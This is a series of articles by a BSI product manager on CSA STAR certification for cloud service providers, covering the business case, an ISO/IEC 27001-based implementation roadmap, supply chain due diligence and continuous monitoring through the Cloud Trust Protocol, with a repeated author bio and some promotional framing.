ABOUT BSI

Our comprehensive approach creates a gateway to excellence for your organization. BSI's training, assessment services, and software enable your business to continually improve. BSI's internal and lead auditor training provides an understanding of the rigors of management system standards and how to ensure compliance. Our assessments offer independent audits of your adherence to these standards. BSI's configurable, web-based software solution, Entropy, automates risk management, document control, audit and compliance, performance, and incident management, effectively managing the drive for continuous improvement across the organization. From the decision to improve systems through to registration and continual improvement, BSI is your business improvement solutions partner.

ABOUT THE AUTHOR

John DiMaria; CSSBB, HISP, MHISP, AMBCI, is the ISO Product Manager for BSI Group Americas. He
has 30 years of successful experience in Standards and Management System Development, including
Information Systems, ITSM, Business Continuity and Quality Assurance. John is responsible for overseeing, product roll-out, and client/sales education. He is a product spokesperson for BSI Group America, Inc
regarding all standards covering Risk, Quality, Sustainability and Regulatory Compliance. John was one
of the key innovators of CSA STAR Certification for cloud providers, a contributing author of the American
Bar Association's Cybersecurity Handbook, a working group member and key contributor to the NIST Cybersecurity Framework.

John has been a keynote speaker internationally and featured in many publications concerning various topics regarding information security, sustainability and business continuity such as Computer World, Quality Magazine, Continuity Insights, Health
and Safety Magazine, ABA Banking Journal, CPM Magazine, and Disaster Recovery Journal, GSN Magazine (dubbed Business Continuity's new standard bearer) and featured on the cover of PENTEST Magazine.


ROAD MAP TO CSA STAR CERTIFICATION
OPTIMIZING PROCESSES, REDUCING COST AND MEETING INTERNATIONAL REQUIREMENTS
by John DiMaria

Corporate strategist Joel A. Barker stated that "when a paradigm shifts, everything goes back to zero," and illustrated this meaning with the example of watchmaking (Joel A. Barker, Paradigms: The Business of Discovering the Future (New York: HarperCollins Publishers, 1993), p. 15).

For centuries, the Swiss dominated the watchmaking industry, and their national identity was somewhat tied to their expertise in the precision mechanics required to make accurate timepieces. Yet the Swiss were so attached to that expertise that they hesitated to embrace the new watchmaking technology based on batteries and quartz crystals. With Japan's introduction of the quartz wristwatch in 1969, the Swiss majority market share dropped from 80% at the end of World War II to only 10% in 1974 (Aran Hegarty, Innovation in the Watch Industry, Timezone.com, November 1996, http://people.timezone.com/library/archives/archives0097). Ironically, it was the Swiss who had invented the quartz watch but failed to see its potential.
When a paradigm shifts, you cannot count on past success. New technology, like quartz in watchmaking, can revolutionize a market, creating a tectonic shift in accepted practice. The advent of the cloud is such an advancement in technology, and optimization of its capability is the new paradigm. How organizations evaluate Cloud Service Providers (CSPs) has become key to maximizing that optimization. CSA STAR Certification is the new cloud security standard of excellence.
NOTE

Some of the concepts in article 1 are a prerequisite for this article. It is recommended that you
read article 1 if you have not already done so.


Figure 1. The Business Challenge

Figure 2. Why Optimization?

Optimization of processes is critical to ensure continual improvement. The goal is to lower costs by
increasing efficiencies to offset the costs of increasing security. This will allow improved services to the
customer base.

Figure 3. Optimization Process

However, optimization cannot occur without fully analyzing the organization's current status. Measuring where the organization is today versus where it needs to be long term is critical to optimizing processes.


BUILDING THE BUSINESS CASE FOR PURSUING STAR CERTIFICATION

The benefits of becoming STAR Certified are extensive. Building a convincing business case requires a number of factors. The following is a list of points developed from companies that have become certified.

CERTIFICATION FOR CLOUD SERVICES IS ON THE GLOBAL AGENDA


On the agenda of the European Commission
Requested by the Art. 29 Working Party (European Commission) as a measure for privacy compliance
Already part of government cloud strategy in countries such as the USA, Singapore, Thailand, China, Hong Kong and Taiwan
In Europe, various Member States are looking at a certification/accreditation scheme for cloud services, especially in public procurement
The UK G-Cloud is based on the logic of companies accredited to offer services in the App Store; the STAR process meets these requirements

CSA STAR PRINCIPLES ARE AN EXTENSION OF SCOPE FOR ISO/IEC 27001


Comparability: results are repeatable, quantifiable and comparable across different certification targets
Scalability: the scheme can be applied to large and small organizations
Proportionality (risk-based): evaluation takes into account the risk of occurrence of the threats for which controls are implemented
Composability/modularity: addresses the composition of cloud services, including dependencies and inheritance/reusability of certifications
Technology neutrality: allows innovative or alternative security measures
Transparency: of the overall auditing process

CSA STAR CERTIFICATION IS USER AND BUSINESS FRIENDLY

Provides a globally relevant certification to reduce duplication of efforts
Addresses localized, national-state and regional compliance needs
Addresses industry-specific requirements
Addresses different assurance requirements
Addresses certification staleness: assures the provider is still secure after a point-in-time certification
User-centric
Voluntary, business driven
Leverages global standards/schemes
Does all of the above while recognizing the dynamic and fast-changing world that is the cloud

CERTIFICATION PROVIDES THE ULTIMATE BUSINESS OBJECTIVES

To improve customer trust in cloud services
To improve the security of cloud services
To increase the efficiency of cloud service procurement
To make it easier for cloud providers and customers to achieve compliance
To provide greater transparency to customers about provider security practices
To achieve all the above objectives as cost-effectively as possible

CSA STAR PROVIDES ASSURANCE TO CLIENTS

ISO 27001 requires the organization to evaluate customers' requirements, expectations, and contractual constraints. It necessitates that the organization implement a system to achieve this
ISO 27001 requires the organization to conduct a risk analysis that identifies the risks to meeting customers' expectations
The Cloud Controls Matrix (CCM) requires the organization to address specific issues that are critical to cloud security
The maturity model assesses how well activities are managed in the control areas


THE JOURNEY TO CSA STAR CERTIFICATION: IMPLEMENTATION CONSIDERATIONS AND ROAD MAP
The desire to increase transparency, create competitive advantage, and respond to customer demand are among the primary reasons companies pursue STAR Certification.

A GAP ANALYSIS OF THE INFORMATION SECURITY MANAGEMENT SYSTEM IS REQUIRED AND SHOULD INCLUDE

Security policy
Organizational security
Asset classification and control
Personnel security
Physical and environmental security
Communications and operations management
Access control
System development and maintenance
Business continuity management
Compliance

PLANNING FOR CSA STAR CERTIFICATION

Figure 4. CSA STAR Certification Formula

PLANNING

A management system will need to be built on ISO/IEC 27001 sections 4-10, plus address the applicable ISO/IEC 27001 Annex A and CCM controls and any other internal or regulatory requirements. At minimum, the 10 areas mentioned in the gap analysis above will need to be covered.
As background, ISO/IEC 27001 is a management systems standard with seven core processes (Figure 5). It outlines the processes and procedures an organization must have in place to manage information security issues in core areas of the business. It does not stipulate exactly how each process should operate, allowing for flexibility so an organization can be run as business requirements dictate.

Figure 5. Core Processes



IMPLEMENTATION

PROJECT PLAN

In the implementation phase, a detailed project plan needs to be defined and followed. As Figure 6 indicates, the plan has 4 stages and 18 defined steps.

Figure 6. Planning Route Best Practice

STAGE 1: COMMITMENT TO IMPLEMENT

Identify the organizational goals and objectives. Build a team and assign a leader who has direct access
to top management.


Figure 7. Commitment to Implement

STAGE 2: STATUS UPDATE

Training Needs Analysis: At this point it is important to consider what training will be required. Team members need the proper skills to ensure successful implementation.
Perform a Gap Analysis: It is vital to understand various aspects of the organization in order to know exactly what needs to be achieved to meet the requirements of certification. Mapping a course for a project without the proper information is like driving to a new location without any guidance for reaching the destination. Failure to understand where the gaps lie will cause cost overruns and wasted resources.
Implementation Project Plan Preparation: With the information provided by the gap analysis, developing a well-informed project plan is like mapping out a long journey; the destination, timeframe and best route to take, as well as the milestones that need to be reached along the way, are all required. Resources and responsibilities for each task will need to be outlined to instill process ownership. In the event of unforeseen disruptions, the implementation plan will allow for adjustments and adaptations to stay on track.


Figure 8. Example Project Plan Structure

Estimate Costs: The budget is critical, as every step and control is a cost, so it is important to periodically review and justify the plan's requirements. Subsequent audits also require adequate data and documentation regarding the controls established.

Figure 9. Stage II

STAGE 3: IMPLEMENT AND OPERATE

Support the Project: With the plan and budget in place, it is time to put the plan into action. Hands-on top management commitment is a requirement, as is authorizing each process owner to carry out their tasks to keep them accountable.
Monitor the Project: Continuous monitoring of the project is critical. This is also the stage where internal audits begin. Metrics and key process indicators are established to test the management system, to ensure the metrics and objectives are adequately aligned, and to make any necessary adjustments. The metrics also track maturity and drive continual improvement by constantly monitoring the inputs and outputs of the organization.

Figure 10. Implement and Operate

STAGE 4: MONITOR, MEASURE AND REVIEW

Management Review: During and after implementation, top management needs to review the organization's information security management system (ISMS) at planned intervals to ensure its continuing suitability, adequacy and effectiveness. This is also an indicator of top management involvement.
The management review should include consideration of:
a) the status of actions from previous management reviews
b) changes in external and internal issues that are relevant to the ISMS
c) feedback on the information security performance, including trends from metrics and audit results
Prepare for Certification: This is the point where preparation for the CSA STAR certification audit starts. All the sections of ISO/IEC 27001 should be addressed, and the Statement of Applicability (Figure 12) should be prepared, indicating which controls are in place (including the cloud-specific controls in the CCM), explaining those controls and justifying any exclusions.


Figure 11. Stage 4

Figure 12. SOA


The key factors related to STAR Certification that must be part of the overall ISO/IEC 27001 system are as follows:
Evaluate the efficiency of an organization's ISMS and ensure the scope, processes and objectives are fit for purpose (particularly suitable; fitting; compatible)
Help the organization prioritize areas for improvement and lead it towards business excellence
Enable effective comparison with other organizations in the applicable sector
Enable the auditor to assess a company's performance on long-term sustainability and risks, in addition to ensuring it is Service Level Agreement (SLA) driven
With implementation complete, it is best practice to monitor the system for a specified period of time, depending on the size and complexity of the organization, to ensure the system is flowing as expected. Attention needs to be directed to confirming that key metrics are being monitored and providing the data required, that at least one management review has been held and documented, and that the system has been validated as effective.

LESSONS LEARNED

There are a number of areas where lessons can be learned from organizations that initially had difficulty with certification.
Lack of Commitment: Make sure a good business case has been built and management is committed to the project. Without it, not only will implementation be a challenge, but the system will not be in compliance with the standard.
Time and Resources: These are the two most valuable things in any organization. Management commitment and good planning will ensure there are plenty of both.
Scope and Boundary Creep: Don't try to boil the ocean. There's an old joke: "How do you eat an elephant? One bite at a time." The same is true for implementation. Start small, get some quick wins and expand the scope over time. Unless it is a very small company, trying to certify the entire organization at one time will be a lesson in futility.
Training and Awareness: Proven to be one of the lowest-cost but most effective moves to make, training and awareness can have the greatest impact on process development. Investment to upgrade an organization's talent is never a waste.
Project Management: The need for good project management cannot be overstated. Keeping everyone focused and on track will ensure targets and objectives are met within the appropriate timeframe.

THE CERTIFICATION PROCESS

Certification acts as a screening process for cloud procurement people and brings the accountability and transparency necessary to build trust in the cloud. Below are the next steps and a high-level view of the certification process.

Obtain quotation and submit application
Auditor is appointed
System reviewed to ensure standard requirements are addressed and the registration assessment is planned
Initial assessment conducted
Conformity and effectiveness of the system against the standard assessed, plus maturity evaluation
Corrective action plan (if required) submitted
Registration confirmed
Certificate issued (ISO 27001 + CSA STAR with Maturity Rating); information added to the CSA STAR Registry
Continuous assessment program (3-year cycle)


Figure 13. Certification Steps

CONCLUSION

In summary, there are several key steps that will ensure implementation success. Once achieved, there
are vast advantages and benefits to certification.
Implementation key steps
Obtain commitment and support from senior management
Engage the whole business with good internal communication
Establish a competent and knowledgeable implementation team to deliver best results, sharing roles
and responsibilities
Download the CCM from the CSA
Compare existing systems and processes with the requirements of the CCM. Get feedback from
customers on current processes and service
Make sure the scope is aligned with customer-critical processes and implement all relevant controls
Benchmark current capability against the maturity model and identify opportunities to improve
Clearly lay out a well-communicated plan of activities and timescales. Make sure roles are understood
Train staff to carry out internal audits
Regularly review controls to make sure they remain appropriate, effective and deliver continual improvement
The Cloud Control Matrix (CCM) and ISO/IEC 27001 advantages
Mapped against all the other relevant standards: ISO 27001, COBIT, HIPAA, NIST SP800-53, FedRamp, PCI, BITS, GAPP, Jericho Forum, NERC CIP, ENISA IAF, etc
Written with the intention to make it publicly available.
Updated to keep pace with changes.
Drives continuous improvement
How it provides assurance to your clients
ISO 27001 requires the organization to evaluate their customers' requirements, expectations, and contractual constraints. It requires that a system has been implemented to achieve this
ISO 27001 requires the organization to have conducted a risk analysis that identifies the risks to meeting their customers' expectations
The CCM requires the organization to address specific issues that are critical to cloud security
The maturity model assesses how well activities are managed in the control areas.


Sales and Marketing Benefits:


Can be added to the current management system
An ISO/IEC 27001 certification plus a STAR certificate are evidence of both compliance and performance to suppliers, customers, and other interested parties
The ability to benchmark an organizations performance and gauge improvement from year to year
An independently validated report from an external certification body (CB) which can be used to demonstrate an organization's progress and performance levels
Exclusive to the STAR Registry
Meets G-Cloud requirements (Mark Dunne, Cloud Security Alliance and Government Cloud, eForensics Magazine ISG issue 04, Feb 2014, p. 2)
Strategic Benefits:
A 360 enhanced assessment giving senior management full visibility to evaluate the effectiveness of
both their management system and the roles and responsibilities of personnel within the organization.
A flexible assessment that can be tailored through the Statement of Applicability. This guarantees
the results and measurements of assessments are both relevant and necessary in helping organizations manage their business.
A comprehensive business report that goes beyond a usual assessment report and gives a strategic
and accurate overview of an organizations performance enabling senior management to identify action areas needed.
A set of improvement targets to encourage an organization to move beyond compliance toward continual improvement.
Operational Benefits
Scalable to organizations of all sizes. Provides information that allows an understanding of where the organization is now, measurement of any improvements, internal benchmarking of sites, and potentially benchmarking of the external supply chain to stimulate healthy competition.
A visual representation of the status of a business that instantly highlights strengths and weaknesses, allowing clients to maximize resources, improve operational efficiencies and reduce costs.
Independent reassurance to prove to senior management where the risks, threats, and opportunities
lie within a business.
ABOUT THE AUTHOR

John DiMaria; CSSBB, HISP, MHISP, AMBCI, is the ISO Product Manager for BSI Group Americas. He
has 30 years of successful experience in Standards and Management System Development, including
Information Systems, ITSM, Business Continuity and Quality Assurance. John is responsible for overseeing, product roll-out, and client/sales education. He is a product spokesperson for BSI Group America, Inc
regarding all standards covering Risk, Quality, Sustainability and Regulatory Compliance. John was one
of the key innovators of CSA STAR Certification for cloud providers, a contributing author of the American
Bar Association's Cybersecurity Handbook, a working group member and key contributor to the NIST Cybersecurity Framework.

John has been a keynote speaker internationally and featured in many publications concerning various topics regarding information security, sustainability and business continuity such as Computer World, Quality Magazine, Continuity Insights, Health
and Safety Magazine, ABA Banking Journal, CPM Magazine, and Disaster Recovery Journal, GSN Magazine (dubbed Business Continuity's new standard bearer) and featured on the cover of PENTEST Magazine.

EFORENSICS CSA STAR CERTIFICATION
SUPPLY CHAIN MANAGEMENT USING CSA STAR CERTIFICATION
by John DiMaria

When an organization adopts cloud services, it is in fact expanding its operations from a local or regional presence to a more global one. As a result, the corresponding organizational operations strategy needs to be adjusted to align with these changes. A more formal analysis of the supply-chain, as part of a more comprehensive due diligence review, also needs to be considered. (By definition, the Cloud Controls Matrix (CCM) is a baseline set of security controls created by the Cloud Security Alliance to help enterprises assess the risk associated with a cloud computing provider.)

Last year, the Cloud Security Alliance (CSA) published a report entitled The Notorious Nine, outlining the top threats in cloud security (Top Threats Working Group, 2013). Not surprisingly, Insufficient Due Diligence made the list. The report points out that organizations are rushing to the cloud without a complete understanding of the cloud service provider's (CSP) environment, applications or even the various services which are being pushed to the cloud. It is also not always clear how the CSP handles incidents, encryption, and security monitoring. Organizations are rarely aware of all the risks they take when working with a CSP. In fact, the risks are multifaceted and far more complex than those they experienced before moving to the cloud.


CSA went on to point out that an organization that rushes to adopt cloud services may subject itself to a number of issues, including:

Contractual issues over obligations regarding liability, response, and/or transparency
Mismatched expectations between the CSP and the customer
Lack of internal training and awareness within the user organization
Potential for software designers/engineers developing software to be unaware of the associated risks

Many organizations are turning to the cloud because of the resources required to manage complex supply chains. It can be challenging for most organizations to understand the supply-chain structure of the CSP's environment; however, an increase in transparency will increase trust.
As pointed out in the 2013 report by PwC and the MIT Forum for Supply Chain Innovation, "The size of the supply chain network has increased, dependencies between entities and between functions have shifted, the speed of change has accelerated and the level of transparency has decreased" (PwC and the MIT Forum for Supply Chain Innovation, 2013). This is certainly a call to action, and STAR Certification can serve as the screening process that allows cloud users to have the transparency required to make informed decisions and increase trust.
STAR Certification serves the supply-chain well for both users and providers by:

Improving customer trust in cloud services
Enhancing the security of cloud services
Increasing the efficiency of cloud service procurement
Making it easier for cloud providers and customers to show compliance
Providing greater transparency to customers about provider security practices
Achieving these objectives as cost-effectively as possible

By requiring STAR Certification down the supply-chain, and in particular of tier one and tier two suppliers, the following will be recognized and addressed:

A globally relevant certification to reduce duplication of efforts is provided
Localized, national, state, and regional compliance needs are met
Industry-specific requirements are managed
Different assurance requirements are controlled
Certification staleness is prevented, and assurance is given that the provider remains secure after a point-in-time certification
Service is user-centric, voluntary, and business driven
Global standards/schemes are leveraged

The CSA STAR Registry serves as a depository for organizations at all levels of transparency, i.e., self-assessment or certification, allowing the user to know the scope covered and whether the organization is certified.
In certifying to CSA STAR, the supplier complies with the most rigorous scheme ever developed for cloud security, based on the most globally accepted information security standard, ISO/IEC 27001. CSPs are monitored to ensure their systems mature and grow, through a measurement of how well the processes are managed and how they improve over time.


Figure 1. Example Process Maturity Report

It is critical that businesses and other organizations that depend on cloud services adopt a similar approach in evaluating those services and demand the highest level of transparency available. The harm
that potential disruptions or breaches pose to daily operations must be equaled by the allocation of sufficient resources to assess threats, take preventive measures, and mitigate damage that results from any
incidents that occur. Failure to work with suppliers to mitigate threats and prepare an effective response
can lead to huge financial losses, irreparable damage to the organization, or even its untimely demise.
In module 4, we will reveal the next step in improving transparency and trust in the cloud: continuous monitoring.
BIBLIOGRAPHY

PwC and the MIT Forum for Supply Chain Innovation. (2013). Making the Right Risk Decisions to Strengthen Operations Performance. PwC.
Top Threats Working Group. (2013). The Notorious Nine Cloud Computing Top Threats in 2013. Cloud Security Alliance.

ABOUT THE AUTHOR

John DiMaria; CSSBB, HISP, MHISP, AMBCI, is the ISO Product Manager for BSI Group Americas. He
has 30 years of successful experience in Standards and Management System Development, including
Information Systems, ITSM, Business Continuity and Quality Assurance. John is responsible for overseeing, product roll-out, and client/sales education. He is a product spokesperson for BSI Group America, Inc
regarding all standards covering Risk, Quality, Sustainability and Regulatory Compliance. John was one
of the key innovators of CSA STAR Certification for cloud providers, a contributing author of the American
Bar Association's Cybersecurity Handbook, a working group member and key contributor to the NIST Cybersecurity Framework.

John has been a keynote speaker internationally and featured in many publications concerning various topics regarding information security, sustainability and business continuity such as Computer World, Quality Magazine, Continuity Insights, Health
and Safety Magazine, ABA Banking Journal, CPM Magazine, and Disaster Recovery Journal, GSN Magazine (dubbed Business Continuity's new standard bearer) and featured on the cover of PENTEST Magazine.


CONTINUOUS MONITORING
CONTINUOUS AUDITING/ASSESSMENT OF RELEVANT SECURITY PROPERTIES
by John DiMaria

While the Cloud Security Alliance's (CSA) STAR Certification has certainly raised the bar for cloud providers, any audit is still a snapshot of a point in time. What goes on between audits can still be a blind spot. To provide greater visibility, the CSA developed the Cloud Trust Protocol (CTP), an industry initiative which will enable real-time monitoring of a CSP's security properties, as well as providing continuous transparency of services and comparability between services on core security properties (Source: CSA CTP Working Group Charter).

What you will learn:
In the last 3 modules we covered STAR Certification and the increased transparency created by the expanded scope, Cloud Control Matrix (CCM), and maturity model. STAR Certification raises the level of trust users have in cloud service providers (CSPs). This module is a look into the future.

This process is now being further developed by BSI and other industry leaders. CTP forms part of the Governance, Risk, and Compliance stack and the Open Certification Framework as the continuous monitoring component, complementing the point-in-time assessments provided by STAR Certification and STAR Attestation. CTP is a common technique and nomenclature for requesting and receiving evidence and affirmation of current cloud service operating circumstances from CSPs.

CONTINUOUS MONITORING: THE CONCEPT

According to the current CTP guidelines, in order to be of maximum benefit, there must be a meaningful comparison between products and accurate data reporting the state of the system being measured. Therefore, security attributes and their metrics must be:
Well defined: the parameter definition is not ambiguous. Suppliers must not be able to interpret measures differently, which would allow them to game the market by applying more generous interpretations, reducing comparability and degrading consumer trust.
Determinate: multiple measurements of identical systems in identical states must give the same result. For example, measurements which produce random results are of no value.


Correlated: customer utility attribute metrics must be strongly correlated with perceived value to consumers. For example, clock speed for CPUs is not a useful measure unless it is correlated with real-world performance on typical consumer tasks.
Comparable: the parameter must reflect the same quantity across different measurement targets. For example, if the scope of measurement is not well defined, one cloud provider may report the availability of the coffee machine in its data center, while another might report the availability of its web services. In this case, the measurements are not comparable.
Standardized: the same exact term and definition are used across different contexts. If suppliers report product features according to different terms, results are not comparable.

Figure 1. CSA GRC Stack Model (The GRC Stack (V2.0): Understanding and applying the CSA GRC stack for payoffs and protection. Cloud Security Alliance. https://csa.org/wp-content/uploads/2011/11/GRC_STACK_PPT_FINAL.pptx, accessed August 1, 2014)

The main goal of the CTP is to allow cloud clients to make queries about critical security attributes in
the cloud. It is expected that continuous monitoring will be an extension of the CSA STAR Certification
process and attributes will be validated and certified as part of the STAR Certification scheme.
BSI has taken a leadership role by Co-Chairing the CTP Working Group. As the original developers of
information security standards and one of the co-founders of ISO, we volunteer our expertise in the spirit
of technological and process advancement.
CSA STAR Continuous is currently under development and the target date of delivery is 2015.
Please monitor the CSA Website: https://cloudsecurityalliance.org/star/ for the latest developments
and contact BSI at Inquiry.msamericas@bsigroup.com with questions.
ABOUT THE AUTHOR

John DiMaria; CSSBB, HISP, MHISP, AMBCI, is the ISO Product Manager for BSI Group Americas. He
has 30 years of successful experience in Standards and Management System Development, including
Information Systems, ITSM, Business Continuity and Quality Assurance. John is responsible for overseeing, product roll-out, and client/sales education. He is a product spokesperson for BSI Group America, Inc
regarding all standards covering Risk, Quality, Sustainability and Regulatory Compliance. John was one
of the key innovators of CSA STAR Certification for cloud providers, a contributing author of the American
Bar Association's Cybersecurity Handbook, a working group member and key contributor to the NIST Cybersecurity Framework.

John has been a keynote speaker internationally and featured in many publications concerning various topics regarding information security, sustainability and business continuity such as Computer World, Quality Magazine, Continuity Insights, Health
and Safety Magazine, ABA Banking Journal, CPM Magazine, and Disaster Recovery Journal, GSN Magazine (dubbed Business Continuity's new standard bearer) and featured on the cover of PENTEST Magazine.
